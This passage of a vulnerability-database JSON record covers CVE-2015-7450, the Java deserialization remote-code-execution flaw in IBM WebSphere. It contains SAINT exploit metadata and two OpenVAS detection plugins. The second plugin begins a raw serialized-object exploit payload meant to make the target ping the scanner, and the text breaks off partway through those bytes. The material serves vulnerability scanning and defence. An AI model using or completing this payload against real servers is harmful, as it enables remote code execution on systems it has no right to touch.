"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2016-02-03T00:00:00", "id": "SAINT:66FBA7CC8FD20610677EE0D63C3A16A6", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/websphere_serialjava", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T14:59:50", "description": "Added: 02/03/2016 \nCVE: [CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \n\n\n### Background\n\nIBM WebSphere Management console 7.x and 8.5.0 - 8.5.5.7 are packaged with a vulnerable version of the Apache Commons package. \n\n### Problem\n\nApache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \n\n### Limitations\n\nThis exploit was tested against WebSphere 8.5.5.1 on Redhat Enterprise Linux 7. \n\n### References\n\n<http://www-01.ibm.com/support/docview.wss?uid=swg21970575> \n\n\n### Resolution\n\nInstall the patch provided in IBM security bulletin swg21970575. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-02-03T00:00:00", "type": "saint", "title": "IBM WebSphere Management Server Apache Commons", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2016-02-03T00:00:00", "id": "SAINT:2A4358BF31AF1DF12CC0825DE2A0B1D2", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/websphere_serialjava", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:37:07", "description": "The host is running IBM WebSphere\n Application Server and is prone to unserialize vulnerability.", "cvss3": {}, "published": "2015-11-17T00:00:00", "type": "openvas", "title": "IBM WebSphere Application Server Unserialize Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7450"], "modified": "2019-02-21T00:00:00", "id": "OPENVAS:1361412562310806624", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806624", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ibm_websphere_application_server_unserialize_vuln.nasl 13803 2019-02-21 08:24:24Z cfischer $\n#\n# IBM WebSphere Application Server Unserialize Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:ibm:websphere_application_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806624\");\n script_version(\"$Revision: 13803 $\");\n script_cve_id(\"CVE-2015-7450\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-21 09:24:24 +0100 (Thu, 21 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-11-17 17:28:17 +0530 (Tue, 17 Nov 2015)\");\n script_name(\"IBM WebSphere Application Server Unserialize Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"gb_ibm_websphere_detect.nasl\");\n script_mandatory_keys(\"ibm_websphere_application_server/installed\");\n\n script_xref(name:\"URL\", value:\"https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/#websphere\");\n\n script_tag(name:\"summary\", value:\"The host is running IBM WebSphere\n Application Server and is prone to unserialize vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to presence\n of a deserialization error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code on the affected system.\");\n\n script_tag(name:\"affected\", value:\"IBM WebSphere Application Server (WAS)\n 8.5.5.7 and prior.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for\n at least one year since the disclosure of this vulnerability. Likely none will be\n provided anymore. General solution options are to upgrade to a newer release,\n disable respective features, remove the product or replace the product by\n another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!webVer = get_app_version(cpe:CPE, nofork:TRUE)){\n exit(0);\n}\n\nif(version_is_less_equal(version:webVer, test_version:\"8.5.5.7\")){\n report = report_fixed_ver(installed_version:webVer, fixed_version:\"WillNotFix\");\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-16T16:49:00", "description": "IBM WebSphere Application Server is prone to remote code-execution vulnerability.", "cvss3": {}, "published": "2016-07-29T00:00:00", "type": "openvas", "title": "IBM WebSphere Application Server Remote Code Execution Vulnerability (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7450"], "modified": "2020-04-15T00:00:00", "id": "OPENVAS:1361412562310105835", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105835", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# IBM WebSphere Application Server Remote Code Execution Vulnerability (Active Check)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:ibm:websphere_application_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105835\");\n script_bugtraq_id(77653);\n script_cve_id(\"CVE-2015-7450\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2020-04-15T08:52:55+0000\");\n script_name(\"IBM WebSphere Application Server Remote Code Execution Vulnerability (Active Check)\");\n script_tag(name:\"last_modification\", value:\"2020-04-15 08:52:55 +0000 (Wed, 15 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-07-29 15:54:10 +0200 (Fri, 29 Jul 2016)\");\n script_category(ACT_ATTACK);\n script_family(\"Web Servers\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_ibm_websphere_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80, 8880);\n script_mandatory_keys(\"ibm_websphere_application_server/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/77653\");\n script_xref(name:\"URL\", value:\"https://www-01.ibm.com/support/docview.wss?uid=swg21970575\");\n script_xref(name:\"URL\", value:\"http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the affected application.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a serialized object which execute a ping against the scanner.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references or vendor advisory for more information.\");\n\n script_tag(name:\"summary\", value:\"IBM WebSphere Application Server is prone to remote code-execution vulnerability.\");\n\n script_tag(name:\"affected\", value:\"Version 8.5 and 8.5.5 Full Profile and Liberty Profile\n\n Version 8.0\n\n Version 7.0\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"dump.inc\");\n\nif( ! port = get_app_port( cpe:CPE, service:\"www\" ) )\n exit( 0 );\n\nif( ! get_app_location( port:port, cpe:CPE ) )\n exit( 0 );\n\nsoc = open_sock_tcp( port );\nif( ! soc )\n exit( 0 );\n\npayload = raw_string(\n0xac,0xed,0x00,0x05,0x73,0x72,0x00,0x32,0x73,0x75,0x6e,0x2e,0x72,0x65,0x66,0x6c,\n0x65,0x63,0x74,0x2e,0x61,0x6e,0x6e,0x6f,0x74,0x61,0x74,0x69,0x6f,0x6e,0x2e,0x41,\n0x6e,0x6e,0x6f,0x74,0x61,0x74,0x69,0x6f,0x6e,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,\n0x69,0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x55,0xca,0xf5,0x0f,0x15,0xcb,\n0x7e,0xa5,0x02,0x00,0x02,0x4c,0x00,0x0c,0x6d,0x65,0x6d,0x62,0x65,0x72,0x56,0x61,\n0x6c,0x75,0x65,0x73,0x74,0x00,